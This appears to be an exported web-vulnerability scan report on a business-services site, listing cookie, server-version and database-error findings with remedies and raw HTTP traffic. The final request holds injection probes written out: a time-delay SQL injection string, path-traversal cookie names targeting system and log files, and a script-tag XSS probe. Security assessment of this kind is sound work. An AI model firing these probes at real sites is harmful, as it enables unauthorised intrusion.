style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Select Vendor',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <div class="vendorCategoriesContanier" style="height: 210px;"> <h1 style="background-color:#f2f2f2;font-size:16px;"> Save Up to 60% on Services for Your Business <br/> <span style="font-size:14px;color:#f16913">Select Category to Get Free, No Obligation Quotes from Vendor</span> </h1> <ul class="vendorCategoriesBody"> <li><a href="http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc" title="Web Site Design" target="_new">Web Site Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc" title="Business Phone Systems" target="_new">Business Phone Systems</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc" title="Logo Design" target="_new">Logo Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc" title="Credit Card Processing" target="_new">Credit Card Processing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc" title="Incorporation" target="_new">Incorporation</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc" title="Business Loans" target="_new">Business Loans</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc" title="Outbound Telemarketing" target="_new">Outbound Telemarketing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc" title="Payroll Services" target="_new">Payroll Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc" title="Long Distance Services" target="_new">Long Distance Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc" title="Direct Mail Services" target="_new">Direct Mail Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc" title="Business Cash Advance" target="_new">Business Cash Advance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/onad00/project.php?catId=80003&iusrc=iupsc" title="Internet Marketing Services" target="_new">Internet Marketing Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc=iupsc" title="Web Hosting" target="_new">Web Hosting</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc" title="Health Insurance" target="_new">Health Insurance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc" title="Call Center Services" target="_new">Call Center Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc" title="Internet Access" target="_new">Internet Access</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/resf00/project.php?catId=40001&iusrc=iupsc" title="HR Outsourcing" target="_new">HR Outsourcing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc" title="Collection Agencies" target="_new">Collection Agencies</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/voip00/project.php?catId=110005&iusrc=iupsc" title="Business VoIP" target="_new">Business VoIP</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc" title="Accounting and Bookkeeping" target="_new">Accounting and Bookkeeping</a></li> <br class="clear" /> </ul> </div> </div> <div style="margin-top:20px;"><img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map"> <map name="Map"> <area shape="rect" coords="1,-1,185,65" href="https://twitter.com/VendorSourcing" target="_blank"> <area shape="rect" coords="197,1,381,63" href="http://www.youtube.com/insideupvendors" target="_blank"> <area shape="rect" coords="390,2,578,64" href="http://insideup.com/blogs/b2bsourcing" target="_blank"> </map> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <a href="http://itunes.apple.com/app/insideup-vendor-quotes/id381971606?mt=8#i" target="_new"><img src="/images/iPhone-Banner.jpg"></a> </div> <div class="grid_3" style="margin-top:20px;"> <div class="vendorArticle"> <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FInsi..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /index.html

/index.html CONFIRMED

http://www.insideup.com/index.html

Identified Cookie

JSESSIONID

Request

GET /index.html HTTP/1.1
Referer: http://www.insideup.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:14 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; Path=/
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search"/> <meta name="description" content="InsideUp: Only the best business services."/> <meta name="robots" content="index; follow"/> <meta name="google-site-verification" content="lFftEaTI4_fI8Hgn8kmfZ7dyxFFymwxze9qghpcHBSs" /> <title>Research and choose the best business services and take your company to the next level.</title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('InsideUp Home',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><script type='text/javascript'><!--//<![CDATA[ var m3_u = (location.protocol=='https:'?'https://www.insideup.com/openx/www/delivery/ajs.php':'http://www.insideup.com/openx/www/delivery/ajs.php'); var m3_r = Math.floor(Math.random()*99999999999); if (!document.MAX_used) document.MAX_used = ','; document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u); document.write ("?zoneid=2"); document.write ('&amp;cb=' + m3_r); if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used); document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : '')); document.write ("&amp;loc=" + escape(window.location)); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); if (document.context) document.write ("&context=" + escape(document.context)); if (document.mmm_fo) document.write ("&amp;mmm_fo=1"); document.write ("'><\/scr"+"ipt>");//]]>--></script><noscript><a href='http://www.insideup.com/openx/www/delivery/ck.php?n=a08b960a&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://www.insideup.com/openx/www/delivery/avw.php?zoneid=2&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a08b960a' border='0' alt='' /></a></noscript> </div> <div style="margin-top:20px;"> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><script type='text/javascript'><!--//<![CDATA[ var m3_u = (location.protocol=='https:'?'https://www.insideup.com/openx/www/delivery/ajs.php':'http://www.insideup.com/openx/www/delivery/ajs.php'); var m3_r = Math.floor(Math.random()*99999999999); if (!document.MAX_used) document.MAX_used = ','; document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u); document.write ("?zoneid=3"); document.write ('&amp;cb=' + m3_r); if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used); document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : '')); document.write ("&amp;loc=" + escape(window.location)); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); if (document.context) document.write ("&context=" + escape(document.context)); if (document.mmm_fo) document.write ("&amp;mmm_fo=1"); document.write ("'><\/scr"+"ipt>");//]]>--></script><noscript><a href='http://www.insideup.com/openx/www/delivery/ck.php?n=a750dce4&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://www.insideup.com/openx/www/delivery/avw.php?zoneid=3&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a750dce4' border='0' alt='' /></a></noscript> <a href="http://insideup.com/blogs/b2bleadgen/"><img src="/images/new_blog.jpg"></a> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag is to be placed on an SSL page, change the * 'http://www.insideup.com/openx/www/delivery/...' * to * 'https://www.insideup.com/openx/www/delivery/...' * * This noscript section of this tag only shows image banners. There * is no width or height in these banners, so if you want these tags to * allocate space for the ad before it shows, you will need to add this * information to the <img> tag. * * If you do not want to deal with the intricities of the noscript * section, delete the tag (from <noscript>... to </noscript>). On * average, the noscript tag is called from less than 1% of internet * users. */--><!--/* OpenX Javascript Tag v2.8.7 */--><!--/* * The backup image section of this tag has been generated for use on a * non-SSL page. If this tag..
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://www.insideup.com/

Extracted Version

2.2.9 (Fedora)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:15:14 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://www.insideup.com/index.html
Content-Length: 299
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.insideup.com/index.html">here</a>.</p><hr><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 80</address></body></html>
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /openx/www/

/openx/www/

http://www.insideup.com/openx/www/

Extracted Version

PHP/5.2.6

Request

GET /openx/www/ HTTP/1.1
Referer: http://www.insideup.com/openx/www/delivery/ck.php?n=a08b960a&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Location: http://www.insideup.com/openx/www/admin/index.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&i..

Parameters

Parameter Type Value
catId GET ';WAITFOR DELAY '0:0:25'--
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 